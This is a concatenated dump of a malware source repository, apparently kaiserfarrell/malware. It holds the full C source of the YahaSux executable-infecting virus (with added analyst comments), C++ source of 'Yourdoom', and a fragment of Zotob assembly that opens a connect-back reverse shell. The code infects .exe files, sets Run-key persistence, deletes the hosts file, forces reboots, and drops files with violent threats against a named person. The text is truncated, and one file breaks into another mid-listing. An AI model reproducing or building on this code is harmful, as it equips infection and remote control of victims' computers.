#endif 151 | -------------------------------------------------------------------------------- /wrathrage/project.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/project.cpp -------------------------------------------------------------------------------- /yahasux/yahasux.c: -------------------------------------------------------------------------------- 1 | /* 2 | Virus Name: YahaSux 3 | Version: B 4 | Type: Win32 EXE Prepender 5 | Author: Gigabyte [Metaphase] 6 | Homepage: http://coderz.net/gigabyte 7 | */ 8 | 9 | 10 | #include 11 | #include 12 | #include 13 | #include "yahasux.h" 14 | 15 | /* Size of the prepended stub in 1024-byte blocks: WriteVirus copies this many blocks and CopyOrig seeks past VIRUSSIZE*1024 bytes. */ #define VIRUSSIZE 32 16 | 17 | using namespace std; 18 | 19 | /* Analyst note: returns the single byte at file offset 19 (fseek with whence 0) of SRCFileName. main() compares the result with 'g' and skips files where it matches, so this byte serves as the already-infected marker. */ char VirCheck(char SRCFileName[]) 20 | { 21 | FILE *SRC; 22 | char Buffer[1]; 23 | int v=0; 24 | SRC=fopen(SRCFileName,"rb"); 25 | 26 | if(SRC) 27 | { 28 | fseek(SRC,19,0); 29 | fread(Buffer,1,1,SRC); 30 | } 31 | 32 | fclose(SRC); 33 | return Buffer[0]; 34 | } 35 | 36 | /* Analyst note: creates or truncates DSTFileName ("wb") and copies at most VIRUSSIZE reads of 1024 bytes from the start of SRCFileName into it. */ void WriteVirus(char SRCFileName[],char DSTFileName[]) 37 | { 38 | FILE *SRC, *DST; 39 | char Buffer[1024]; 40 | short Counter=0; 41 | int v = 0; 42 | SRC=fopen(SRCFileName, "rb"); 43 | if(SRC) 44 | { 45 | DST = fopen(DSTFileName, "wb"); 46 | if(DST) 47 | { 48 | for (v=0;v < VIRUSSIZE;v++) 49 | { 50 | Counter = fread(Buffer, 1, 1024, SRC); 51 | if(Counter) 52 | fwrite(Buffer, 1, Counter, DST); 53 | } 54 | } 55 | } 56 | fclose(SRC); 57 | fclose(DST); 58 | } 59 | 60 | /* Analyst note: appends the whole of SRCFileName to DSTFileName (opened "ab") in 1024-byte reads. */ void AddOrig(char SRCFileName[],char DSTFileName[]) 61 | { 62 | FILE *SRC,*DST; 63 | char Buffer[1024]; 64 | short Counter=0; 65 | SRC=fopen(SRCFileName,"rb"); 66 | if(SRC) 67 | { 68 | DST=fopen(DSTFileName,"ab"); 69 | if(DST) 70 | { 71 | while(!feof(SRC)) 72 | { 73 | Counter=fread(Buffer,1,1024,SRC); 74 | if(Counter) 75 | fwrite(Buffer,1,Counter,DST); 76 | } 77 | } 78 | } 79 | fclose(SRC); 80 | fclose(DST); 81 | } 82 | 83 | void InfectFile(char
hostfile[],char virus[]) 84 | /* Analyst note: after this call the host file consists of the first VIRUSSIZE*1024 bytes of `virus` followed by the unmodified original host. The original is staged as "yahasux.exe" in the current directory. For remediation, CopyOrig() below shows that the original program is everything after the first VIRUSSIZE*1024 bytes. */ { 85 | CopyFile(hostfile,"yahasux.exe",FALSE); 86 | WriteVirus(virus,hostfile); 87 | AddOrig("yahasux.exe",hostfile); 88 | } 89 | 90 | /* Analyst note: writes everything after the first VIRUSSIZE*1024 bytes of SRCFileName to DSTFileName, i.e. the original host stored behind the prepended stub. */ void CopyOrig(char SRCFileName[], char DSTFileName[]) 91 | { 92 | FILE *SRC,*DST; 93 | char Buffer[1024]; 94 | short Counter=0; 95 | int v=0; 96 | SRC=fopen(SRCFileName,"rb"); 97 | if(SRC) 98 | { 99 | DST=fopen(DSTFileName,"wb"); 100 | if(DST) 101 | { 102 | fseek(SRC,(VIRUSSIZE*1024),0); 103 | 104 | while(!feof(SRC)) 105 | { 106 | Counter=fread(Buffer,1,1024,SRC); 107 | if(Counter) 108 | fwrite(Buffer,1,Counter,DST); 109 | } 110 | } 111 | } 112 | fclose(SRC); 113 | fclose(DST); 114 | } 115 | 116 | /* Returns true when FileName can be opened for reading with OPEN_EXISTING; the handle is closed again immediately. */ bool FileExists(char *FileName) 117 | { 118 | HANDLE Exists; 119 | Exists=CreateFile(FileName,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0); 120 | if(Exists==INVALID_HANDLE_VALUE) 121 | return false; 122 | CloseHandle(Exists); 123 | return true; 124 | } 125 | 126 | /* Analyst note: walks a Toolhelp process snapshot and terminates the first process whose image name contains "WinServices.exe" or "WINSER~1.EXE". Returns true only when TerminateProcess succeeds; main() uses that result to gate its registry and file clean-up. */ int KillWinServices () 127 | { 128 | HANDLE PrListHandle,PrHandle; 129 | PROCESSENTRY32 processList; 130 | int counter = 0; 131 | 132 | PrListHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 133 | 134 | while (true) 135 | { 136 | /* first pass uses Process32First, later passes Process32Next */ if (counter == 0) 137 | { 138 | if (Process32First(PrListHandle, &processList) == FALSE && GetLastError()==ERROR_NO_MORE_FILES) 139 | { 140 | CloseHandle(PrListHandle); 141 | return false; 142 | } 143 | } 144 | else 145 | { 146 | if (Process32Next(PrListHandle, &processList) == FALSE) 147 | { 148 | if (GetLastError() != ERROR_NO_MORE_FILES) 149 | { 150 | CloseHandle(PrListHandle); 151 | return false; 152 | } 153 | else 154 | { 155 | CloseHandle(PrListHandle); 156 | break; 157 | } 158 | } 159 | } 160 | 161 | /* substring match on the image name, long and 8.3 short form */ if (strstr(processList.szExeFile,"WinServices.exe")||strstr(processList.szExeFile,"WINSER~1.EXE")) 162 | { 163 | PrHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, processList.th32ProcessID); 164 | if (!TerminateProcess(PrHandle, NULL)) 165 | return false; 166 | else 167 | return true; 168
| CloseHandle(PrHandle); 169 | } 170 | counter++; 171 | } 172 | return false; 173 | } 174 | 175 | /* Analyst summary of main(), taken from the calls visible below. (1) If "nav32_loader.exe" is present in the system directory and c:\MathMagic.scr is absent, it drops a copy of itself as winstart.exe, stops the WinServices process, rewrites the exefile open command and the Run key, and deletes a fixed list of file names. (2) It prepends itself to the .exe files in the mIRC download directory and, on NT-family systems, in the Windows directory. (3) It sets the Internet Explorer start page. (4) On first run it writes c:\MathMagic.scr and yahasux.vbs, runs the script hidden and forces a reboot. (5) When started from an infected host it extracts and runs the original program. Every file name and registry path mentioned here is a literal from this listing and can be used as an indicator. */ void main(int argc, char **argv) 176 | { 177 | struct HKEY__* reghandle; 178 | char sysdir[50],windir[40],MyDocsPath[MAX_PATH],winstartpath[70]; 179 | DWORD MyDocsLength=MAX_PATH; 180 | WIN32_FIND_DATA FileData; 181 | HANDLE SearchHandle,hToken; 182 | FILE* MailFile; 183 | const unsigned char startpage[]="http://127.0.0.1"; 184 | TOKEN_PRIVILEGES tkp; 185 | OSVERSIONINFO winver; 186 | 187 | winver.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); 188 | GetVersionEx(&winver); 189 | 190 | /* all relative file names below resolve against the system directory until the next SetCurrentDirectory */ GetSystemDirectory(sysdir,50); 191 | SetCurrentDirectory(sysdir); 192 | 193 | /* trigger: nav32_loader.exe exists and the c:\MathMagic.scr marker does not */ if(FileExists("nav32_loader.exe")&&!(FileExists("c:\\MathMagic.scr"))) 194 | { 195 | WriteVirus(argv[0],"winstart.exe"); 196 | strcpy(winstartpath,sysdir); 197 | strcat(winstartpath,"\\winstart.exe"); 198 | 199 | if(KillWinServices()) 200 | { 201 | /* sets the default exefile open command under HKLM\Software\Classes and HKCR to the literal shown; presumably this undoes a handler change made by the other worm, which cannot be confirmed from this file */ RegSetValue(HKEY_LOCAL_MACHINE,"Software\\Classes\\exefile\\shell\\open\\command",REG_SZ,"\"%1\" %*",7); 202 | RegSetValue(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",REG_SZ,"\"%1\" %*",7); 203 | /* persistence indicator: RegSetValue writes the winstart.exe path as the default value of the HKLM Run key */ RegSetValue(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",REG_SZ,winstartpath,strlen(winstartpath)); 204 | 205 | /* NOTE(review): the "®handle" argument on this page is presumably "&reghandle" mangled by HTML entity decoding; the same applies to the other RegOpenKey calls */ RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",®handle); 206 | RegQueryValueEx(reghandle,"Personal",NULL,NULL,(BYTE*)MyDocsPath,&MyDocsLength); 207 | RegCloseKey(reghandle); 208 | 209 | /* removes the Run value named "WinServices" */ RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",®handle); 210 | RegDeleteValue(reghandle,"WinServices"); 211 | RegCloseKey(reghandle); 212 | 213 | /* fixed list of file names deleted from the current (system) directory; several literals carry a trailing space */ DeleteFile("WinServices.exe"); 214 | DeleteFile("nav32_loader.exe"); 215 | DeleteFile("hotmail_hack.exe"); 216 | DeleteFile("friendship.scr "); 217 | DeleteFile("world_of_friendship.scr "); 218 | DeleteFile("shake.scr"); 219 | DeleteFile("Sweet.scr"); 220 | DeleteFile("Be_Happy.scr "); 221 | DeleteFile("Friend_Finder.exe");
222 | DeleteFile("I_Like_You.scr"); 223 | DeleteFile("love.scr"); 224 | DeleteFile("dance.scr"); 225 | DeleteFile("GC_Messenger.exe"); 226 | DeleteFile("True_Love.scr"); 227 | DeleteFile("Friend_Happy.scr"); 228 | DeleteFile("Best_Friend.scr"); 229 | DeleteFile("life.scr"); 230 | DeleteFile("colour_of_life.scr"); 231 | DeleteFile("friendship_funny.scr"); 232 | DeleteFile("funny.scr"); 233 | 234 | /* resets attributes to FILE_ATTRIBUTE_NORMAL on the entries of the directory read from the "Personal" shell-folder value */ SetCurrentDirectory(MyDocsPath); 235 | SearchHandle=FindFirstFile("*.*",&FileData); 236 | SetFileAttributes(FileData.cFileName,FILE_ATTRIBUTE_NORMAL); 237 | 238 | while(FindNextFile(SearchHandle,&FileData)) 239 | SetFileAttributes(FileData.cFileName,FILE_ATTRIBUTE_NORMAL); 240 | } 241 | } 242 | 243 | 244 | /* when running as winstart.exe: delete tcpsvs32.exe and show the message box that follows */ if(strstr(argv[0],"winstart.exe")) 245 | { 246 | DeleteFile("tcpsvs32.exe"); 247 | MessageBox(NULL,"Hi there.. it seems you were infected with Yaha.k. That worm however, written by an idiot who sPeLlS lIkE tHiS, abused my website and got me to receive the complaints. Therefore, I have just disinfected you. Don't worry tho..
as I didn't wanna steal from you, I gave you this virus (Win32.HLLP.YahaSux) in return :)\n\nGreetz,\n\nGigabyte [Metaphase VX Team]","Exchange viruses?",MB_OK|MB_ICONINFORMATION); 248 | } 249 | 250 | /* infection pass over the .exe files in c:\progra~1\mirc\download; files whose marker byte is 'g' are skipped */ if(FileExists("c:\\progra~1\\mirc\\mirc.exe")) 251 | { 252 | SetCurrentDirectory("c:\\progra~1\\mirc\\download"); 253 | SearchHandle=FindFirstFile("*.exe",&FileData); 254 | if(SearchHandle!=INVALID_HANDLE_VALUE) 255 | { 256 | if(VirCheck(FileData.cFileName)!='g') 257 | InfectFile(FileData.cFileName,argv[0]); 258 | 259 | while(FindNextFile(SearchHandle,&FileData)) 260 | { 261 | if(VirCheck(FileData.cFileName)!='g') 262 | InfectFile(FileData.cFileName,argv[0]); 263 | } 264 | 265 | /* removes the staging copy left by InfectFile */ DeleteFile("yahasux.exe"); 266 | } 267 | } 268 | 269 | /* sets the current user's Internet Explorer "Start Page" value to http://127.0.0.1 */ RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",®handle); 270 | RegSetValueEx(reghandle,"Start Page",0,REG_SZ,startpage,16); 271 | 272 | GetWindowsDirectory(windir,40); 273 | SetCurrentDirectory(windir); 274 | 275 | /* NT-family only: the same infection pass over the .exe files in the Windows directory; the FindNextFile loop excludes explorer.exe and the yahasux.exe staging copy */ if(winver.dwPlatformId==VER_PLATFORM_WIN32_NT) 276 | { 277 | SearchHandle=FindFirstFile("*.exe",&FileData); 278 | if(VirCheck(FileData.cFileName)!='g') 279 | InfectFile(FileData.cFileName,argv[0]); 280 | 281 | while(FindNextFile(SearchHandle,&FileData)) 282 | { 283 | if(strcmp(FileData.cFileName,"explorer.exe")&&VirCheck(FileData.cFileName)!='g'&&strcmp(FileData.cFileName,"yahasux.exe")) 284 | InfectFile(FileData.cFileName,argv[0]); 285 | } 286 | 287 | DeleteFile("yahasux.exe"); 288 | } 289 | 290 | /* first-run path: c:\MathMagic.scr doubles as the "already ran" marker tested here and at the top of main. MailData (2346 bytes, defined in yahasux.h, not shown on this page) is written to yahasux.vbs in the current directory and launched hidden. */ if(!(FileExists("c:\\MathMagic.scr"))) 291 | { 292 | WriteVirus(argv[0],"c:\\MathMagic.scr"); 293 | fwrite(MailData,2346,1,MailFile=fopen("yahasux.vbs","wb")); 294 | fclose(MailFile); 295 | ShellExecute(NULL,"open","yahasux.vbs",NULL,NULL,SW_HIDE); 296 | 297 | /* on NT-family systems the shutdown privilege is enabled on the process token first */ if(winver.dwPlatformId==VER_PLATFORM_WIN32_NT) 298 | { 299 | OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken); 300 | LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); 301 | tkp.PrivilegeCount=1; 302
| tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; 303 | AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0); 304 | } 305 | 306 | /* waits 40 seconds, then forces a reboot */ Sleep(40000); 307 | ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0); 308 | } 309 | 310 | /* started from an infected host (argv[0] is none of the virus's own file names): the original program is extracted to screwyaha.exe and run, and the loop spins until that temporary copy can be deleted */ if(!(strstr(argv[0],"winstart.exe")||strstr(argv[0],"MathMagic.scr")||strstr(argv[0],"yahasux.exe"))) 311 | { 312 | CopyOrig(argv[0],"screwyaha.exe"); 313 | WinExec("screwyaha.exe",SW_SHOWNORMAL); 314 | while(!DeleteFile("screwyaha.exe")){} 315 | } 316 | } -------------------------------------------------------------------------------- /yourdoom/Icon_1.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/yourdoom/Icon_1.ico -------------------------------------------------------------------------------- /yourdoom/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/yourdoom/icon.ico -------------------------------------------------------------------------------- /yourdoom/main.cpp: -------------------------------------------------------------------------------- 1 | /* written by bob.....Fufill your dreams. Mine has come true...has yours??" */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | using namespace std; 13 | 14 | const char msg1[]="This is Yourdoom. this malware is just for experimental purposes only"; 15 | 16 | //please add a backdoor component, email harvester and SMTP engine please??
i don't know how :( 17 | 18 | int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, 19 | LPSTR lpszArgument, int nFunsterStil) 20 | 21 | { 22 | HWND hide; //hides this console windows from the user 23 | AllocConsole(); 24 | hide = FindWindowA("ConsoleWindowClass", NULL); 25 | ShowWindow(hide, 0); 26 | 27 | //create a mutex for yourdoom 28 | { 29 | CreateMutexA(NULL, TRUE, "yourdoom!!!!!"); 30 | if (GetLastError() == ERROR_ALREADY_EXISTS) 31 | ExitProcess(0); 32 | return 0; 33 | } 34 | 35 | /*overwrite localhost file 36 | { 37 | char host[MAX_PATH]; 38 | GetSystemDirectory(host, sizeof(host)); 39 | strcat(host, "\\Drivers\\ETC\\HOSTS"); 40 | const char* buffer = 41 | "127.0.0.1 www.myspace.com"; 42 | "127.0.0.1 www.norton.com"; 43 | "127.0.0.1 www.kazaa.com"; 44 | "127.0.0.1 www.kazaa.de"; 45 | "127.0.0.1 www.kaspersky.com"; 46 | "127.0.0.1 www.kasperskylabs.com"; 47 | "127.0.0.1 www.symantec.com"; 48 | "127.0.0.1 www.housecall.com"; 49 | "127.0.0.1 www.grisoft.com"; 50 | "127.0.0.1 www.safety.live.com"; 51 | "127.0.0.1 www.vxchoas.cjb.net"; 52 | "127.0.0.1 www.live.com"; 53 | "127.0.0.1 www.google.com"; 54 | "127.0.0.1 www.nai.com"; 55 | "127.0.0.1 www.awil.com"; 56 | "127.0.0.1 www.avast.com"; 57 | "127.0.0.1 www.ca.com"; 58 | "127.0.0.1 www3.ca.com"; 59 | "127.0.0.1 www.microsoft.com"; 60 | "127.0.0.1 www.getfirefox.com"; 61 | "127.0.0.1 www.windowsmarketplace.com"; 62 | "127.0.0.1 www.dell.com"; 63 | "127.0.0.1 www.hewlett-packard.com"; 64 | "127.0.0.1 www.myspace.com"; //god dawm alot of people at school won't shut up about myspace!!! 
65 | "127.0.0.1 myspace.com"; //need to be sure it get's blocked 66 | "127.0.0.1 www.apple.com"; 67 | "127.0.0.1 www.compaq.com"; //i highly doubt it but try to block some computer manufacturer sites 68 | "127.0.0.1 www.linux.org"; 69 | "127.0.0.1 www.pandasoftware.com"; 70 | "127.0.0.1 127.0.0.1"; 71 | "127.0.0.1 www.microsoft.net"; 72 | 73 | DWORD byte; 74 | HANDLE hFile = CreateFile(host, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); 75 | BOOL bSuccess = WriteFile ( hFile, buffer, strlen(buffer), &byte, NULL); 76 | CloseHandle(hFile); 77 | } 78 | */ 79 | 80 | //let's screw up the hosts file sense idk how to overwrite it. 81 | system("del C:\WINDOWS\System32\drivers\etc\hosts"); 82 | system("echo 127.0.0.1 http://www.myspace.com >> C:\WINDOWS\System32\drivers\etc\hosts"); 83 | //#endif 84 | 85 | //let's run notepad on the infected computer 86 | char Notepad[MAX_PATH]="notepad.exe"; 87 | ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE); 88 | 89 | //let's run Calculator on the infected computer 90 | char Calculator[MAX_PATH]="calc.exe"; 91 | ShellExecute(NULL,"open",Calculator,NULL,NULL,SW_MAXIMIZE); 92 | 93 | //let's run microsoft word 94 | char Microsoft_Office_Word[MAX_PATH]="winword.exe"; 95 | ShellExecute(NULL,"open",Microsoft_Office_Word,NULL,NULL,SW_MAXIMIZE); 96 | 97 | //let's run internet explorer on the infected computer 98 | char Internet_Explorer[MAX_PATH]="iexplore.exe"; 99 | ShellExecute(NULL,"open",Internet_Explorer,NULL,NULL,SW_MAXIMIZE); 100 | 101 | //let's run telnet server on the infected computer 102 | char TlntSvr[MAX_PATH]="tlnsvr.exe"; 103 | ShellExecute(NULL,"open",TlntSvr,NULL,NULL,SW_MAXIMIZE); 104 | 105 | //let's run wordpad on the infected computer 106 | char Wordpad[MAX_PATH]="write.exe"; 107 | ShellExecute(NULL,"open",Wordpad,NULL,NULL,SW_MAXIMIZE); 108 | 109 | //this is where we turn off and on the monitor 110 | SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2); 111 | Sleep(500); 112 | 
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) -1); 113 | 114 | /* copy to the hard drive */ 115 | char system[MAX_PATH]; 116 | char pathtofile[MAX_PATH]; 117 | HMODULE GetModH = GetModuleHandle(NULL); 118 | GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); 119 | GetSystemDirectory(system,sizeof(system)); //get %system32% 120 | strcat(system,"\\yourdoom.exe"); //file name copied to %system32%\yourdoom.exe 121 | CopyFile(pathtofile,system,false); 122 | 123 | //this is where we make the registry entries 124 | HKEY hKey; 125 | RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey ); 126 | RegSetValueEx(hKey, "Microsoft Windows Update",0,REG_SZ,(const unsigned char*)system,sizeof(system)); 127 | RegCloseKey(hKey); 128 | 129 | //create some files 130 | { 131 | char txtfile[MAX_PATH]; 132 | char tempdir[MAX_PATH]; 133 | char ttxtline[MAX_PATH]; 134 | char txtline[MAX_PATH]; 135 | char This_File[MAX_PATH]; 136 | HANDLE f; 137 | DWORD r; 138 | PROCESS_INFORMATION pinfo; 139 | STARTUPINFO sinfo; 140 | GetTempPath(sizeof(tempdir), tempdir); 141 | sprintf(txtfile, "%s\\kevin_you_suck_dick.exe", tempdir); 142 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 143 | if (f != INVALID_HANDLE_VALUE) { 144 | // write a TXT Encoded PIF (MS-DOS Executable) file flaming kevin 145 | WriteFile(f, "I just want to say.....Kevin Shut your fucking mouth, because it looks like a donkeys ass", 105, &r, NULL); 146 | CloseHandle(f); 147 | 148 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 149 | sinfo.cb = sizeof(sinfo); 150 | sinfo.wShowWindow = SW_HIDE; 151 | memset(This_File,0,sizeof(This_File)); 152 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 153 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 154 | 155 | // execute the TEXT file 156 | //CreateProcess(NULL, txtline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo); 157 | 158 | 
char txtfile[MAX_PATH]; 159 | char tempdir[MAX_PATH]; 160 | char ttxtline[MAX_PATH]; 161 | char txtline[MAX_PATH]; 162 | char This_File[MAX_PATH]; 163 | HANDLE f; 164 | DWORD r; 165 | PROCESS_INFORMATION pinfo; 166 | STARTUPINFO sinfo; 167 | GetTempPath(sizeof(tempdir), tempdir); 168 | sprintf(txtfile, "%s\\XDNS.dll", tempdir); 169 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 170 | if (f != INVALID_HANDLE_VALUE) { 171 | // write a random generated DLL in %TEMP%/XDNS.dll 172 | WriteFile(f, "KILLING YOU KEVIN\r\n", 105, &r, NULL); 173 | CloseHandle(f); 174 | 175 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 176 | sinfo.cb = sizeof(sinfo); 177 | sinfo.wShowWindow = SW_HIDE; 178 | memset(This_File,0,sizeof(This_File)); 179 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 180 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 181 | 182 | char txtfile[MAX_PATH]; 183 | char tempdir[MAX_PATH]; 184 | char ttxtline[MAX_PATH]; 185 | char txtline[MAX_PATH]; 186 | char This_File[MAX_PATH]; 187 | HANDLE f; 188 | DWORD r; 189 | PROCESS_INFORMATION pinfo; 190 | STARTUPINFO sinfo; 191 | GetTempPath(sizeof(tempdir), tempdir); 192 | sprintf(txtfile, "%s\\xproxy.dll", tempdir); 193 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 194 | if (f != INVALID_HANDLE_VALUE) { 195 | // write a random generated DLL in %TEMP%/xproxy.dll 196 | WriteFile(f, "I WILL STAB YOU IN THE BACK OF THE HEAD KEVIN.\r\n", 105, &r, NULL); 197 | CloseHandle(f); 198 | 199 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 200 | sinfo.cb = sizeof(sinfo); 201 | sinfo.wShowWindow = SW_HIDE; 202 | memset(This_File,0,sizeof(This_File)); 203 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 204 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 205 | 206 | char txtfile[MAX_PATH]; 207 | char tempdir[MAX_PATH]; 208 | char ttxtline[MAX_PATH]; 209 | char txtline[MAX_PATH]; 210 | char This_File[MAX_PATH]; 211 | HANDLE f; 212 | DWORD r; 213 | 
PROCESS_INFORMATION pinfo; 214 | STARTUPINFO sinfo; 215 | GetTempPath(sizeof(tempdir), tempdir); 216 | sprintf(txtfile, "%s\\yourdoom.sys", tempdir); 217 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 218 | if (f != INVALID_HANDLE_VALUE) { 219 | // write a random generated DLL in %TEMP%/youdoom.sys 220 | WriteFile(f, "KEVIN I'M GOING TO MURDER YOU IN COLD BLOOD. I'M FUCKING GOING TO SHOOT YOU WITH A M16 OVER YOUR GRAVE. \r\n", 105, &r, NULL); 221 | CloseHandle(f); 222 | 223 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 224 | sinfo.cb = sizeof(sinfo); 225 | sinfo.wShowWindow = SW_HIDE; 226 | memset(This_File,0,sizeof(This_File)); 227 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 228 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 229 | 230 | char txtfile[MAX_PATH]; 231 | char tempdir[MAX_PATH]; 232 | char ttxtline[MAX_PATH]; 233 | char txtline[MAX_PATH]; 234 | char This_File[MAX_PATH]; 235 | HANDLE f; 236 | DWORD r; 237 | PROCESS_INFORMATION pinfo; 238 | STARTUPINFO sinfo; 239 | GetTempPath(sizeof(tempdir), tempdir); 240 | sprintf(txtfile, "%s\\xproxy.sys", tempdir); 241 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 242 | if (f != INVALID_HANDLE_VALUE) { 243 | // write a random generated DLL in %TEMP%/xproxy.sys 244 | WriteFile(f, "I'm going to kill you", 105, &r, NULL); 245 | CloseHandle(f); 246 | 247 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 248 | sinfo.cb = sizeof(sinfo); 249 | sinfo.wShowWindow = SW_HIDE; 250 | memset(This_File,0,sizeof(This_File)); 251 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 252 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 253 | 254 | /*#define site "http:\\SITE.com/viruses/virus.exe"; 255 | //yourdoom will download file from this site 256 | #define path "C:\\bling_bling_ssh.exe"; 257 | //path where to save file 258 | */ 259 | 260 | //eject the cdtray 261 | { 262 | ofstream cdopen; 263 | cdopen.open("C:\\Documents and Settings\\All 
Users\\Start Menu\\Programs\\Startups\\cd.vbs",ios::out); 264 | cdopen << "do" << endl; 265 | cdopen << "wscript.sleep 100" << endl; 266 | cdopen << "Set oWMP = CreateObject(\"WMPlayer.OCX.7\")" << endl; 267 | cdopen << "Set colCDROMs = oWMP.cdromCollection" << endl; 268 | cdopen << "if colCDROMs.Count then" << endl; 269 | cdopen << "For i = 0 to colCDROMs.Count - 1" << endl; 270 | cdopen << "colCDROMs.Item(i).Eject" << endl; 271 | cdopen << "Next" << endl; 272 | cdopen << "End If" << endl; 273 | cdopen << "loop" << endl; 274 | } 275 | //flip the mouse buttons using this handy dandy Batch Script :) 276 | { 277 | ofstream mouse; 278 | mouse.open("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\mouse.cmd",ios::out); 279 | mouse << "RUNDLL32 USER32.DLL,SwapMouseButton" <> 8) & 0xFF)) << 16) ) 64 | 65 | push edx 66 | push edx 67 | push edx 68 | push edx 69 | push byte 1 70 | push byte 2 71 | call DWORD _WSASocket 72 | xchg ebx, eax 73 | 74 | mov edx, esp 75 | push byte 0x10 76 | push edx 77 | push ebx 78 | call connect 79 | add esp, byte 0x10 80 | or eax, eax 81 | jz .createprocess 82 | 83 | .retry 84 | push ebx 85 | call closesocket 86 | 87 | push byte (CBACK_TIMEOUT / CBACK_CHK_CONN) 88 | pop ecx 89 | 90 | .sleep 91 | push ecx 92 | push CBACK_CHK_CONN 93 | call Sleep 94 | pop ecx 95 | cmp DWORD [CONNECTED], 0 96 | je .exit 97 | 98 | loop .sleep 99 | jmp short .gethost 100 | 101 | .exit 102 | push DWORD [MTX_CBACK] 103 | call ReleaseMutex 104 | 105 | push BYTE 0 106 | call ExitThread 107 | 108 | 109 | .createprocess 110 | push byte 0x11 111 | pop ecx 112 | mov edx, edi 113 | mov edi, esp 114 | lea esi, [edi + 0x44] 115 | push esi 116 | push edi 117 | 118 | push edi 119 | rep stosd 120 | pop edi 121 | 122 | mov byte [edi], 0x44 123 | inc byte [edi + 0x2c] ;STARTF_USESHOWWINDOW 124 | inc byte [edi + 0x2d] ;STARTF_USESTDHANDLES 125 | lea edi, [edi + 0x38] 126 | mov eax, ebx 127 | stosd 128 | stosd 129 | stosd 130 | mov edi, edx 131 | push ecx 132 | 
push ecx
133 |     push ecx
134 |     push eax ;TRUE
135 |     push ecx
136 |     push ecx
137 |     push STR_CMD
138 |     push ecx
139 |     call CreateProcess
140 |
141 |     lodsd
142 |     push eax
143 |     push byte -1
144 |     push eax
145 |     call WaitForSingleObject
146 |
147 |     call CloseHandle
148 |     push DWORD [esi]
149 |     call CloseHandle
150 |
151 |     jmp short .retry
152 |
--------------------------------------------------------------------------------
/zotob/Zotob Code/RELEASE/make.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | REM Build helper: assembles %1.asm with nasmw (win32 object, %2-%5 passed through as extra options) and links %1.exe for the windows subsystem with entry symbol "entry".
3 | del %1.obj 2>nul
4 | REM del %1.exe >nul
5 | nasmw -O9 -fwin32 %2 %3 %4 %5 %1.asm
6 | c:\masm32\bin\link /NOLOGO /RELEASE /entry:entry /subsystem:windows /STACK:2097152,1000 %1.obj c:\masm32\lib\kernel32.lib c:\masm32\lib\wininet.lib c:\masm32\lib\wsock32.lib c:\masm32\lib\user32.lib c:\masm32\lib\MSVCRT.LIB c:\masm32\lib\advapi32.lib /OUT:%1.exe
7 | del %1.obj 2>nul
8 |
--------------------------------------------------------------------------------
/zotob/Zotob Code/RELEASE/shellcode.asm:
